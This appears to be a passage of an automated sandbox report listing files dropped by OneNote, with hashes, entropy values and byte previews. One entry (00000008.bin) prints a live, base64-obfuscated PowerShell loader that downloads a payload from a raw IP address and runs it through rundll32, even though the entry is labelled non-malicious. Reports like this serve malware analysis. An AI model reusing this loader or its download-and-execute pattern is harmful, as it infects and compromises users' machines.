C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000001.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	386 compact demand paged pure executable not stripped
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.312943005139063
Encrypted:	false
SSDEEP:	384:JciQQrDXsgME7mPKRtdBDGi4KF/od8Uq5PbJ2hnEnK/V0QvP9MoIB:eiZeKRdyiZoC5PUhnEKPIB
MD5:	94DB817E39E9153620FF932CFF98449E
SHA1:	E17AAE01E16BB51F378E959CB080A941BB26B992
SHA-256:	11CFC794D2869849F9D7CD9C6261AB5B20F48D2FE64503B1B03AEE257F2806C6
SHA-512:	23BBE295DA3ADD68E6531BC4DFF1552BD063A6A4DCCFA69D83BA6B5498C823CAEEE802CC4356AF6FD1F34A6D38341A89A93EDEDE94B3DB725B32A277FE3A1E2E
Malicious:	false
Preview:	................................0.......H...-...........................?..~.............................................................................................?...........4@..B&. . ........s.....K.Z.G.A..........P....&...H....K.s.....K.Z.G.A...........4...V8O.<.!............s.....K.Z.G.A...........G...Le...........z.......?.....................??.~.............................................................................................?..................R.ox..J.%..-.......D..N{I....2..~.....A... L..HJ......]l......aw..{.M.....4..ByK.R.ox..J.%..-......B....6.H.;..3....y}m.........9..."F.B...7N0.....$.Jp.Ks..)r..5..Z.]..D..N{I....2..~....i.....#....m......."..@....r...._..R'WD..X.5'K......Op.b..F.$..i.................................F....Q...[.d.........v.vT4...I$...A................0......@..K.I.H.]yY.i.......Op.b..F.$..i..........E:..@H......@...........@...@.Op.b..F.$..i........Op.b..F.$..i..............@.....r.....z...E..g..........Un.w.........V{...u.4\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000002.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	SysEx File -
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	5.102849306573264
Encrypted:	false
SSDEEP:	96:g578zUrbjMp5O+WeratORWtzHlWj2E37EvLRWLHDInGrmk9q7z6DHEkf:g+zUrbjZvaVItr7ILHM6Ny
MD5:	591EE8A376C129F76EF91B9DC5F108B8
SHA1:	AD6DDFE2328E14990E8EF32F8F7D30E345773928
SHA-256:	526A0D759F29EF031264015054BB03607A1CC2FA5159ADA53E9479759703ACC8
SHA-512:	AC95ADD35D622360424CB079B6026D09742C5FD63A86A1908DB9D5EA4BA724ABD5E19CD955E6946322F7ABCCECA27D168DBC843B416008923AA9CEAA396270BC
Malicious:	false
Preview:	....8..............@............?....?..?...................................................................................................................8...V.......4..@.............................X$......X$4&./N...."YX..............-F.....;.......-F.....;......_.^m.^F..5..U..._...X$4&./N...."YX.X$............................................................................5......_.7...7L...................................................................................x....@......Z....h...N...............F...\G.L.....e.........................................................x.......x.......x.......p........e...........x....@......Z.........._......._.....................................................".......d.1..._.N.:..._.N.H.._.7._.7...........................................4..(...(......_.7P'..._.7P.G.._.7`.?.._.7P...._.7X.R.._.7P.i.._.7T...._.7.....................X$...o...................................X$..c..,..............2.......,...x............_.......X$._.7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000003.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.5288521081549895
Encrypted:	false
SSDEEP:	192:EYrS9rap+DsuLKfhbZPT/KsBM0cxZuIX:EYo2kDsOi5vOxZuIX
MD5:	CB87DBEC9F9B6F5C13C264DAF4D53397
SHA1:	7ACC069F9AEF362B7716D2D1AE431CD4EBB5A360
SHA-256:	61A0518947C2EC7AE5AC4158410D0EFC3FECDBE4A8101840926119258E12A272
SHA-512:	44165830F8DE5FA67DD8837F86CFD43260620BCEBFF5BE5D143634E25C8AE5965FE380599CF66B38C2ADEB9374842D1E27A80F1748296157C61276E8BF37E095
Malicious:	false
Preview:	.......@........p..........~....................?.......?............................~..................................................................V......@...........................@.....h_.j.2.....j.2.^.N....J..F...........@.....h_.........0.......0.......H.......H........J.....C...h..P..J.......j.2...................................................................5......_.7...7L......................j.2.........................................................$.N..Q..$.N\....$.N..P.N................Bo..O....nl-.........2...............................j.2.$.N....+...J..N............J.......J.....C...h..P.............B..C.H.n.l.............................................................N.......N....(.,.1...............B..C.H.n.l............................4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........&.......`...6...N....(.,.1....[..u@.....D9U.J.....C...h..P.........j.2.$.N.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.2620589094041788
Encrypted:	false
SSDEEP:	12:JYq6NYOQur4YwXpCl60/hGlllxoLF3pg5dNd4jviSP4i9Upx:qaOppwXpClLhGl/xd5dNd4j54r
MD5:	4D31782E9812813898109C2FE9E23B94
SHA1:	DBC6882A7E745229638E9903B373E639735E74FC
SHA-256:	35F5F5199380E3CE2FF62DB47C9FF68DB67316D30647FF6C79D71640698E475B
SHA-512:	838DF077D7AA1D1BFED30BE76CFB32D7DB9D04D646B1ACE10E54912F257A30462CD8DF11FA3F3AB43BA32E1C7FE83D59DF229783051B5E7DCD53B59AD52BC4F5
Malicious:	false
Preview:	....>...........x....................?..................................................................................................................................................................{.......{......O....7....&.......&.o._.L.....qh..v...8B.%......#.v...&.o._.L.....qh'.&..{......O....7...{........{.....................................................................5......_.7...7L......................{..............................................................To.J...b.............................A..We.N..u.y..l....h...N.......................................................................To.J...b.............A..We.N..u.y..l..........&.......&...................................................&...C...&.`.1...&...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s..........v.......v...8B.%......#.&.......&.o._.L.....qh'2.......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.323454019770542
Encrypted:	false
SSDEEP:	24:XqeEv92fgFTVIl7Czvlhf3fRXMEK+Zrm5RbrPS/U5Ylj5l5lfxf3f88f:NEv924FT5B7///gIjTC
MD5:	9446288C2DC755C7F034D58FD52966E8
SHA1:	025C09F91BFEDC0E47B76830A830AD9048479AC4
SHA-256:	12E5361537CBE171EA2FC4030D6D94412FB25F37CAE438C17547BDE8BB455528
SHA-512:	93A194A4F683A83E74F5564D19B2EA57810AC989FE42F5E7E69F714908F6A1A3D6A6333AC08657D9844976565135E59A04EF0DA6CF4743E6EDDE6BFD558F70BB
Malicious:	false
Preview:	....>...............>.......................................................................................................................................v...........................................aQ/.....aQ/....N.l.k.8n.sek.....sek.....9<..D.sek.....9<..D2sek.P.....w. x....[.P...aQ/....N.l.k.8n.aQ/..........sek.....sek.................................................aQ/T....sek..$..sekX....sek...............................................4..(...(...............0............4..e....5..b4.............o....bJ.$.x.j......(...(......%.:.......>..*..K.....z..............sek..0...e... ..$.....}&.u".N......W.PB{t.:........sek.....sek.....9<..D2P.......P.....w. x....[.2...............................aQ/..................................aQ/.....P....c..,0...e...B4.$..........[(..C.5.._......%.:.....................K..j....,....N...^................................................................................................................K..j....,.............K..j....,....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.336266154281417
Encrypted:	false
SSDEEP:	192:VefRhiYmXQ6VRc4xwYOPY7+KdYmRR0W08CvYkkJZRcTuQi:VAqQ6VRrOY+mR0wPRw
MD5:	CD36C54D332A6682FD8DD30612D2ECE5
SHA1:	9178ED627C9F5A1E422A644AB735C12367D64CC1
SHA-256:	A305DCAEAA7BA3945A384042595CD2179E643AD03226A08F639041F4B7552A9B
SHA-512:	91367B3E0445CC42D6A593DFFEF4A1C865A4E5B8E3C34F83004C0870D1B6D02E7106A0781C90535072A6416277A1EE7D085A3F7324880EF302FBCEAAF9FC8F87
Malicious:	false
Preview:	........r..@H......@...H....&.........@...@........T...@..........................................................................?................................................................v.......................>...W^.g..M...=..N..............4\o.):A.:.._..j.........4\o.):A.:.._..j.........LZ.I.......................................................................4.... ..4.......4...... 4......!4............!...............$.s.....K.Z.G.A....p.n.g...............z...,4. ...........$.4..V/.Q........D..N{I....2..~..c.m.d...........u.......A.......a.d.m.i.n...............z... ..$...............................Q...............?......@?..@?...pA...?...........................4..........;.......R4...4...4...4......................0............4..e...b4.............o....bJ.$.x.j......(...(......%.:........z.......................................>...........V..Q.......C...?......@?..@?....?...@...........A...........S.....c............... .B.....$.........F..............3.^.......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (585), with no line terminators
Category:	dropped
Size (bytes):	585
Entropy (8bit):	5.967951232824609
Encrypted:	false
SSDEEP:	12:snL9hLLgyaI4HPKC2EwO45xeM8spEO7b2WO1xyRciV0hMmzVt3FE+pwtB:iphLLCHPKC2Ey1EWbTNV0hJVBa+SB
MD5:	98BF90784670146355CD8C0B448374D9
SHA1:	69BDCEDA1CCD23D7A6AC121A6D06DBD10BDF028F
SHA-256:	EBFA09E9DAAE96EFB34FBF8DC6E4F4564EF72BED884FE4DA3C860687A5668227
SHA-512:	DBEE85B82F972CCED280437B89D030F7DA05F04D86E2EAA9460307DB0B26942BBA66960CE0E72389BD4399BBEC08B6AA01727F7A4DB81F1EE15338BDBA0751F3
Malicious:	false
Preview:	powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) > C:\Users\Public\1.cmd&&start /min C:\Users\Public\1.cmd nd

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.524493621215413
Encrypted:	false
SSDEEP:	24:8hs4smcjlVTb6m7JpgON7mQNmmdnpzmEJmdn:bLfVTb6m7Jp17mQNmmdn5mEJmdn
MD5:	C606C81F4B5B20D4E7B837FE826F5F5E
SHA1:	5DB4EFE9EA928E97853879B83B74D65281DEE6DB
SHA-256:	BFD01326341E0F346F5DD3F8C00426D2B62C244D85931717BB17A93360F29F1F
SHA-512:	D2EF811F57631F7DCFE918765332A799317EE201BD20256FEEA885D2578CBCE7F068E159D8613FE6EF6EDD50826A6840E0B1FA9C0E62BABE898A520A90BAEE54
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........eh......eh....K.FV...!.lvh.....lvh...uE.E.j.6..lvh...uE.E.j.6..lvh..eh....K.FV...!.eh...........................eh...................................................................5......_.7...7L.......................eh.........................................................FS..O.D.8...>......h...N..................&9,O.3..F.[^...............................................................................&9,O.3..F.[^.........FS..O.D.8...>...........lvh.....lvh.................................................lvh..1..lvhX.4.......................................................0...e.......A...^WN..,..^@.`.../;...................4......(...(...........8.....?...............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.880227695087472
Encrypted:	false
SSDEEP:	6:XaE560WGQgEWM4HUWGk2n/llsu/hu9KudlZVG+1FfG3+fuNrUTSdzsOxNHXpvcEx:X67G9pMeGPl6ehaxFw+GNoTuwtE0
MD5:	604247D5B9972FEB45E40160EDE415A6
SHA1:	5AC7D6F1EA3B259887348A99F0F33660D2EB65B9
SHA-256:	6DEF10BDDDFD130F573E1D0F7D4F6ADA85D1C7D44E434E18FD7F2E35F4F64018
SHA-512:	82D620AD3EBEA753F6D01C0BBF0E42769E57CC0E45A95DB0C0F536420FF51ACA4C6E3D9C31D20F7972041B2BF5552117FD4F26A8A65700AF59594510CD2257C8
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................................................................N8......N8.b`".O....}.[............>..E....e......>..E....e......N8.b`".O....}.[N8.................................................................................................5......_.7...7L...................................................................................:...^E.4Ya.K.....h...N.................X@P."N.#..T.................................................................................X@P."N.#..T.............:...^E.4Ya.K..........N8......N8..................................................N8...6..N8.`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.473224704290766
Encrypted:	false
SSDEEP:	48:qebzrAQv+Zesaqxz3L7FExyw0LnzpBlkw0LQu5CLjowEwLNeCQQ:qeEQv8ZxjqxyLxgLUu5ClEwBQ
MD5:	CA3AAC584CD10A9BA7EA7078AABF27BA
SHA1:	2050C45B9908DBA3EAE8CDC56FB68F318A1C05B0
SHA-256:	003001E3917DAFF9971C200963B1285069AAC5149704FE47FE2F8D1664B64257
SHA-512:	482E8D74571FCEB8C91C6733989C41AA6775FDCA755BFBEA4E0F7CFB88A530C52AFB9B4D8F797CD7D19B96E85EF8CF8A4836F54D46EAE56D54E3F02449D942E8
Malicious:	false
Preview:	j......@$...........t......................................................?............................................................................j......@\.........................................#.......#MS...4m..'..z..(.......(We.........P..#MS...4m..'..z..#...........uo`.d.....(We.........P...(............(.......(.......................................................'..........a.oGG.....oGGa....$.?pMu.2...^.............................(.oGG..g}..y....................(.......(X......(..2....(.......(.."...y.T$... ..T.N..^..T%n.......g}.........c..,0...e...B4.$..........C@RQ.H..B......Y.....................y.......y.....N..B.J5T..................uo`...aK..../...z...aK..g}/..mA..^.D...g}..=.oS."B.yt%....=......>.........................uo`.d..(We.........P.=.oS."B.yt%........^.......oGG..c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......\|{....B.l...R......(....Y......(...D...L.e.c.t.u.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.684144066215332
Encrypted:	false
SSDEEP:	192:esVO3pQqQKWgLBL9MXO2vckDK0zeHXaGEqRiNUQ3Ru0:L70B5M+2vFS3GqRi
MD5:	78336191DF5886FDC6C23D1CFBBFAAB0
SHA1:	190D6CAA2C07B9D6ECB030C7874FDB58A0084924
SHA-256:	51827BDB0617C74ACDCC2F1F0AF3B741E8E6E056BE26681015A64870B631FD93
SHA-512:	72AB153BB6381BBCDBDF31751262A3C04B74E98EC14AC84053D848E852680C1CA08F1B569F68E5E024FF2A8F0DD02E8347239F5DD33C23019E802ACD212F0F77
Malicious:	false
Preview:	2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZB+..4...B+.IU...0P....$.B+.IU...0P....$.B+...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............."m.........h9....N...^...................NuC...o..............@f....................................I.qk..B.....LZ............."m.........h9........."m.........h9.........B+......B+......B+..........................................B+.j....B+.T%...B+......B+...7..B+.H....B+. ....B+.$....B+...~...............;........4...4...4.............B+.:B+.YB+.ZB+...z...y.. x.. ...........$........&..$...7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................HB+...z... ..$......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.405083677315561
Encrypted:	false
SSDEEP:	192:c8s9QHJ8LaWagJZcBSJdBtCrteRJmwXD4RkVJuPMhxu1N798JsiZb82NVPnW6sXh:cB96J4+QXrtQtejVD4Rk/uPMO1vUnlq
MD5:	FC4BABA8118C96C440B20EE188C873E4
SHA1:	C35ECA92E1AD0CC7906D462CA4314A8B41CA28D9
SHA-256:	06C4875C67874D3AE5356CE7FA51CE44B69429B52859CCA4D3301231BBD5F5BA
